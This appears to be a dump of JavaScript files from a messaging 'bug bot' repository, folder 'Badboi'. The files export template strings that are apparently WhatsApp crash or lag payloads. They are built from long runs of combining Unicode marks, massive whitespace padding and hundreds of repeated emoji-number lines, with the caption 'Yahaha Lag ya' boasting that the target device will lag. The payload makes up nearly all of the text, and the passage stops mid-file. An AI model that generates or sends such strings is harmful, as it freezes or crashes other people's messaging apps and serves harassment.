ࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈ 3 | ` 4 | } 5 | exports.xeontext9 = xeontext9 -------------------------------------------------------------------------------- /Badboi/xeontext4.js: -------------------------------------------------------------------------------- 1 | const xeontext4 = `𝑫𝑹𝑬𝑨𝑴 𝑮𝑼𝒀 𝑿𝑬𝑶𝑵 𝒙 𝑿𝑬𝑶𝑵 𝑩𝑼𝑮 𝑩𝑶𝑻 2 | 3 | @~*Yahaha Lag ya*~@                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 5 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       6 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           7 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       8 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       9 |                 😈.*~9~*.-*~@9999999~*.🔥.* 10 | 💐.*~7~*.-*~@22222222~*.🦧.* 11 | 🥥.*~0~*.-*~@444444~*.🏖.* 12 | 🎋.*~5~*.-*~@1111111~*.🩸.* 13 | ♿.*~6~*.-*~@5555555~*.⚙.* 14 | 🎁.*~1~*.-*~@7777777~*.🎉.* 15 | 🔮.*~3~*.-*~@666666~*.🎩.* 16 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 17 | 💐.*~7~*.-*~@22222222~*.🦧.* 18 | 🥥.*~0~*.-*~@444444~*.🏖.* 19 | 🎋.*~5~*.-*~@1111111~*.🩸.* 20 | ♿.*~6~*.-*~@5555555~*.⚙.* 21 | 🎁.*~1~*.-*~@7777777~*.🎉.* 22 | 🔮.*~3~*.-*~@666666~*.🎩.* 23 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 24 | 💐.*~7~*.-*~@22222222~*.🦧.* 25 | 🥥.*~0~*.-*~@444444~*.🏖.* 26 | 🎋.*~5~*.-*~@1111111~*.🩸.* 27 | ♿.*~6~*.-*~@5555555~*.⚙.* 28 | 🎁.*~1~*.-*~@7777777~*.🎉.* 29 | 🔮.*~3~*.-*~@666666~*.🎩.* 30 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 31 | 💐.*~7~*.-*~@22222222~*.🦧.* 32 | 🥥.*~0~*.-*~@444444~*.🏖.* 33 | 🎋.*~5~*.-*~@1111111~*.🩸.* 34 | ♿.*~6~*.-*~@5555555~*.⚙.* 35 | 🎁.*~1~*.-*~@7777777~*.🎉.* 36 | 🔮.*~3~*.-*~@666666~*.🎩.* 37 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 38 | 💐.*~7~*.-*~@22222222~*.🦧.* 39 | 🥥.*~0~*.-*~@444444~*.🏖.* 40 | 🎋.*~5~*.-*~@1111111~*.🩸.* 41 | ♿.*~6~*.-*~@5555555~*.⚙.* 42 | 🎁.*~1~*.-*~@7777777~*.🎉.* 43 | 🔮.*~3~*.-*~@666666~*.🎩.* 44 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 45 | 💐.*~7~*.-*~@22222222~*.🦧.* 46 | 🥥.*~0~*.-*~@444444~*.🏖.* 47 | 🎋.*~5~*.-*~@1111111~*.🩸.* 48 | ♿.*~6~*.-*~@5555555~*.⚙.* 49 | 🎁.*~1~*.-*~@7777777~*.🎉.* 50 | 🔮.*~3~*.-*~@666666~*.🎩.* 51 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 52 | 💐.*~7~*.-*~@22222222~*.🦧.* 53 | 🥥.*~0~*.-*~@444444~*.🏖.* 54 | 🎋.*~5~*.-*~@1111111~*.🩸.* 55 | ♿.*~6~*.-*~@5555555~*.⚙.* 56 | 🎁.*~1~*.-*~@7777777~*.🎉.* 57 | 🔮.*~3~*.-*~@666666~*.🎩.* 58 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 59 | 💐.*~7~*.-*~@22222222~*.🦧.* 60 | 🥥.*~0~*.-*~@444444~*.🏖.* 61 | 🎋.*~5~*.-*~@1111111~*.🩸.* 62 | ♿.*~6~*.-*~@5555555~*.⚙.* 63 | 🎁.*~1~*.-*~@7777777~*.🎉.* 64 | 🔮.*~3~*.-*~@666666~*.🎩.* 65 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 66 | 💐.*~7~*.-*~@22222222~*.🦧.* 67 | 🥥.*~0~*.-*~@444444~*.🏖.* 68 | 🎋.*~5~*.-*~@1111111~*.🩸.* 69 | ♿.*~6~*.-*~@5555555~*.⚙.* 70 | 🎁.*~1~*.-*~@7777777~*.🎉.* 71 | 🔮.*~3~*.-*~@666666~*.🎩.* 72 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 73 | 💐.*~7~*.-*~@22222222~*.🦧.* 74 | 🥥.*~0~*.-*~@444444~*.🏖.* 75 | 🎋.*~5~*.-*~@1111111~*.🩸.* 76 | ♿.*~6~*.-*~@5555555~*.⚙.* 77 | 🎁.*~1~*.-*~@7777777~*.🎉.* 78 | 🔮.*~3~*.-*~@666666~*.🎩.* 79 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 80 | 💐.*~7~*.-*~@22222222~*.🦧.* 81 | 🥥.*~0~*.-*~@444444~*.🏖.* 82 | 🎋.*~5~*.-*~@1111111~*.🩸.* 83 | ♿.*~6~*.-*~@5555555~*.⚙.* 84 | 🎁.*~1~*.-*~@7777777~*.🎉.* 85 | 🔮.*~3~*.-*~@666666~*.🎩.* 86 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 87 | 💐.*~7~*.-*~@22222222~*.🦧.* 88 | 🥥.*~0~*.-*~@444444~*.🏖.* 89 | 🎋.*~5~*.-*~@1111111~*.🩸.* 90 | ♿.*~6~*.-*~@5555555~*.⚙.* 91 | 🎁.*~1~*.-*~@7777777~*.🎉.* 92 | 🔮.*~3~*.-*~@666666~*.🎩.* 93 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 94 | 💐.*~7~*.-*~@22222222~*.🦧.* 95 | 🥥.*~0~*.-*~@444444~*.🏖.* 96 | 🎋.*~5~*.-*~@1111111~*.🩸.* 97 | ♿.*~6~*.-*~@5555555~*.⚙.* 98 | 🎁.*~1~*.-*~@7777777~*.🎉.* 99 | 🔮.*~3~*.-*~@666666~*.🎩.* 100 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 101 | 💐.*~7~*.-*~@22222222~*.🦧.* 102 | 🥥.*~0~*.-*~@444444~*.🏖.* 103 | 🎋.*~5~*.-*~@1111111~*.🩸.* 104 | ♿.*~6~*.-*~@5555555~*.⚙.* 105 | 🎁.*~1~*.-*~@7777777~*.🎉.* 106 | 🔮.*~3~*.-*~@666666~*.🎩.* 107 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 108 | 💐.*~7~*.-*~@22222222~*.🦧.* 109 | 🥥.*~0~*.-*~@444444~*.🏖.* 110 | 🎋.*~5~*.-*~@1111111~*.🩸.* 111 | ♿.*~6~*.-*~@5555555~*.⚙.* 112 | 🎁.*~1~*.-*~@7777777~*.🎉.* 113 | 🔮.*~3~*.-*~@666666~*.🎩.* 114 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 115 | 💐.*~7~*.-*~@22222222~*.🦧.* 116 | 🥥.*~0~*.-*~@444444~*.🏖.* 117 | 🎋.*~5~*.-*~@1111111~*.🩸.* 118 | ♿.*~6~*.-*~@5555555~*.⚙.* 119 | 🎁.*~1~*.-*~@7777777~*.🎉.* 120 | 🔮.*~3~*.-*~@666666~*.🎩.* 121 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 122 | 💐.*~7~*.-*~@22222222~*.🦧.* 123 | 🥥.*~0~*.-*~@444444~*.🏖.* 124 | 🎋.*~5~*.-*~@1111111~*.🩸.* 125 | ♿.*~6~*.-*~@5555555~*.⚙.* 126 | 🎁.*~1~*.-*~@7777777~*.🎉.* 127 | 🔮.*~3~*.-*~@666666~*.🎩.* 128 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 129 | 💐.*~7~*.-*~@22222222~*.🦧.* 130 | 🥥.*~0~*.-*~@444444~*.🏖.* 131 | 🎋.*~5~*.-*~@1111111~*.🩸.* 132 | ♿.*~6~*.-*~@5555555~*.⚙.* 133 | 🎁.*~1~*.-*~@7777777~*.🎉.* 134 | 🔮.*~3~*.-*~@666666~*.🎩.* 135 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 136 | 💐.*~7~*.-*~@22222222~*.🦧.* 137 | 🥥.*~0~*.-*~@444444~*.🏖.* 138 | 🎋.*~5~*.-*~@1111111~*.🩸.* 139 | ♿.*~6~*.-*~@5555555~*.⚙.* 140 | 🎁.*~1~*.-*~@7777777~*.🎉.* 141 | 🔮.*~3~*.-*~@666666~*.🎩.* 142 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 143 | 💐.*~7~*.-*~@22222222~*.🦧.* 144 | 🥥.*~0~*.-*~@444444~*.🏖.* 145 | 🎋.*~5~*.-*~@1111111~*.🩸.* 146 | ♿.*~6~*.-*~@5555555~*.⚙.* 147 | 🎁.*~1~*.-*~@7777777~*.🎉.* 148 | 🔮.*~3~*.-*~@666666~*.🎩.* 149 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 150 | 💐.*~7~*.-*~@22222222~*.🦧.* 151 | 🥥.*~0~*.-*~@444444~*.🏖.* 152 | 🎋.*~5~*.-*~@1111111~*.🩸.* 153 | ♿.*~6~*.-*~@5555555~*.⚙.* 154 | 🎁.*~1~*.-*~@7777777~*.🎉.* 155 | 🔮.*~3~*.-*~@666666~*.🎩.* 156 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 157 | 💐.*~7~*.-*~@22222222~*.🦧.* 158 | 🥥.*~0~*.-*~@444444~*.🏖.* 159 | 🎋.*~5~*.-*~@1111111~*.🩸.* 160 | ♿.*~6~*.-*~@5555555~*.⚙.* 161 | 🎁.*~1~*.-*~@7777777~*.🎉.* 162 | 🔮.*~3~*.-*~@666666~*.🎩.* 163 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 164 | 💐.*~7~*.-*~@22222222~*.🦧.* 165 | 🥥.*~0~*.-*~@444444~*.🏖.* 166 | 🎋.*~5~*.-*~@1111111~*.🩸.* 167 | ♿.*~6~*.-*~@5555555~*.⚙.* 168 | 🎁.*~1~*.-*~@7777777~*.🎉.* 169 | 🔮.*~3~*.-*~@666666~*.🎩.* 170 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 171 | 💐.*~7~*.-*~@22222222~*.🦧.* 172 | 🥥.*~0~*.-*~@444444~*.🏖.* 173 | 🎋.*~5~*.-*~@1111111~*.🩸.* 174 | ♿.*~6~*.-*~@5555555~*.⚙.* 175 | 🎁.*~1~*.-*~@7777777~*.🎉.* 176 | 🔮.*~3~*.-*~@666666~*.🎩.* 177 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 178 | 💐.*~7~*.-*~@22222222~*.🦧.* 179 | 🥥.*~0~*.-*~@444444~*.🏖.* 180 | 🎋.*~5~*.-*~@1111111~*.🩸.* 181 | ♿.*~6~*.-*~@5555555~*.⚙.* 182 | 🎁.*~1~*.-*~@7777777~*.🎉.* 183 | 🔮.*~3~*.-*~@666666~*.🎩.* 184 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 185 | 💐.*~7~*.-*~@22222222~*.🦧.* 186 | 🥥.*~0~*.-*~@444444~*.🏖.* 187 | 🎋.*~5~*.-*~@1111111~*.🩸.* 188 | ♿.*~6~*.-*~@5555555~*.⚙.* 189 | 🎁.*~1~*.-*~@7777777~*.🎉.* 190 | 🔮.*~3~*.-*~@666666~*.🎩.* 191 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 192 | 💐.*~7~*.-*~@22222222~*.🦧.* 193 | 🥥.*~0~*.-*~@444444~*.🏖.* 194 | 🎋.*~5~*.-*~@1111111~*.🩸.* 195 | ♿.*~6~*.-*~@5555555~*.⚙.* 196 | 🎁.*~1~*.-*~@7777777~*.🎉.* 197 | 🔮.*~3~*.-*~@666666~*.🎩.* 198 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 199 | 💐.*~7~*.-*~@22222222~*.🦧.* 200 | 🥥.*~0~*.-*~@444444~*.🏖.* 201 | 🎋.*~5~*.-*~@1111111~*.🩸.* 202 | ♿.*~6~*.-*~@5555555~*.⚙.* 203 | 🎁.*~1~*.-*~@7777777~*.🎉.* 204 | 🔮.*~3~*.-*~@666666~*.🎩.* 205 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 206 | 💐.*~7~*.-*~@22222222~*.🦧.* 207 | 🥥.*~0~*.-*~@444444~*.🏖.* 208 | 🎋.*~5~*.-*~@1111111~*.🩸.* 209 | ♿.*~6~*.-*~@5555555~*.⚙.* 210 | 🎁.*~1~*.-*~@7777777~*.🎉.* 211 | 🔮.*~3~*.-*~@666666~*.🎩.* 212 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 213 | 💐.*~7~*.-*~@22222222~*.🦧.* 214 | 🥥.*~0~*.-*~@444444~*.🏖.* 215 | 🎋.*~5~*.-*~@1111111~*.🩸.* 216 | ♿.*~6~*.-*~@5555555~*.⚙.* 217 | 🎁.*~1~*.-*~@7777777~*.🎉.* 218 | 🔮.*~3~*.-*~@666666~*.🎩.* 219 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 220 | 💐.*~7~*.-*~@22222222~*.🦧.* 221 | 🥥.*~0~*.-*~@444444~*.🏖.* 222 | 🎋.*~5~*.-*~@1111111~*.🩸.* 223 | ♿.*~6~*.-*~@5555555~*.⚙.* 224 | 🎁.*~1~*.-*~@7777777~*.🎉.* 225 | 🔮.*~3~*.-*~@666666~*.🎩.* 226 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 227 | 💐.*~7~*.-*~@22222222~*.🦧.* 228 | 🥥.*~0~*.-*~@444444~*.🏖.* 229 | 🎋.*~5~*.-*~@1111111~*.🩸.* 230 | ♿.*~6~*.-*~@5555555~*.⚙.* 231 | 🎁.*~1~*.-*~@7777777~*.🎉.* 232 | 🔮.*~3~*.-*~@666666~*.🎩.* 233 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 234 | 💐.*~7~*.-*~@22222222~*.🦧.* 235 | 🥥.*~0~*.-*~@444444~*.🏖.* 236 | 🎋.*~5~*.-*~@1111111~*.🩸.* 237 | ♿.*~6~*.-*~@5555555~*.⚙.* 238 | 🎁.*~1~*.-*~@7777777~*.🎉.* 239 | 🔮.*~3~*.-*~@666666~*.🎩.* 240 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 241 | 💐.*~7~*.-*~@22222222~*.🦧.* 242 | 🥥.*~0~*.-*~@444444~*.🏖.* 243 | 🎋.*~5~*.-*~@1111111~*.🩸.* 244 | ♿.*~6~*.-*~@5555555~*.⚙.* 245 | 🎁.*~1~*.-*~@7777777~*.🎉.* 246 | 🔮.*~3~*.-*~@666666~*.🎩.* 247 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 248 | 💐.*~7~*.-*~@22222222~*.🦧.* 249 | 🥥.*~0~*.-*~@444444~*.🏖.* 250 | 🎋.*~5~*.-*~@1111111~*.🩸.* 251 | ♿.*~6~*.-*~@5555555~*.⚙.* 252 | 🎁.*~1~*.-*~@7777777~*.🎉.* 253 | 🔮.*~3~*.-*~@666666~*.🎩.* 254 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 255 | 💐.*~7~*.-*~@22222222~*.🦧.* 256 | 🥥.*~0~*.-*~@444444~*.🏖.* 257 | 🎋.*~5~*.-*~@1111111~*.🩸.* 258 | ♿.*~6~*.-*~@5555555~*.⚙.* 259 | 🎁.*~1~*.-*~@7777777~*.🎉.* 260 | 🔮.*~3~*.-*~@666666~*.🎩.* 261 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 262 | 💐.*~7~*.-*~@22222222~*.🦧.* 263 | 🥥.*~0~*.-*~@444444~*.🏖.* 264 | 🎋.*~5~*.-*~@1111111~*.🩸.* 265 | ♿.*~6~*.-*~@5555555~*.⚙.* 266 | 🎁.*~1~*.-*~@7777777~*.🎉.* 267 | 🔮.*~3~*.-*~@666666~*.🎩.* 268 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 269 | 💐.*~7~*.-*~@22222222~*.🦧.* 270 | 🥥.*~0~*.-*~@444444~*.🏖.* 271 | 🎋.*~5~*.-*~@1111111~*.🩸.* 272 | ♿.*~6~*.-*~@5555555~*.⚙.* 273 | 🎁.*~1~*.-*~@7777777~*.🎉.* 274 | 🔮.*~3~*.-*~@666666~*.🎩.* 275 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 276 | 💐.*~7~*.-*~@22222222~*.🦧.* 277 | 🥥.*~0~*.-*~@444444~*.🏖.* 278 | 🎋.*~5~*.-*~@1111111~*.🩸.* 279 | ♿.*~6~*.-*~@5555555~*.⚙.* 280 | 🎁.*~1~*.-*~@7777777~*.🎉.* 281 | 🔮.*~3~*.-*~@666666~*.🎩.* 282 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 283 | 💐.*~7~*.-*~@22222222~*.🦧.* 284 | 🥥.*~0~*.-*~@444444~*.🏖.* 285 | 🎋.*~5~*.-*~@1111111~*.🩸.* 286 | ♿.*~6~*.-*~@5555555~*.⚙.* 287 | 🎁.*~1~*.-*~@7777777~*.🎉.* 288 | 🔮.*~3~*.-*~@666666~*.🎩.* 289 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 290 | 💐.*~7~*.-*~@22222222~*.🦧.* 291 | 🥥.*~0~*.-*~@444444~*.🏖.* 292 | 🎋.*~5~*.-*~@1111111~*.🩸.* 293 | ♿.*~6~*.-*~@5555555~*.⚙.* 294 | 🎁.*~1~*.-*~@7777777~*.🎉.* 295 | 🔮.*~3~*.-*~@666666~*.🎩.* 296 | 🚻.*~8~*.-*~@888888~*.💊.*😈.*~9~*.-*~@9999999~*.🔥.* 297 | 💐.*~7~*.-*~@22222222~*.🦧.* 298 | 🥥.*~0~*.-*~@444444~*.🏖.* 299 | 🎋.*~5~*.-*~@1111111~*.🩸.* 300 | ♿.*~6~*.-*~@5555555~*.⚙.* 301 | 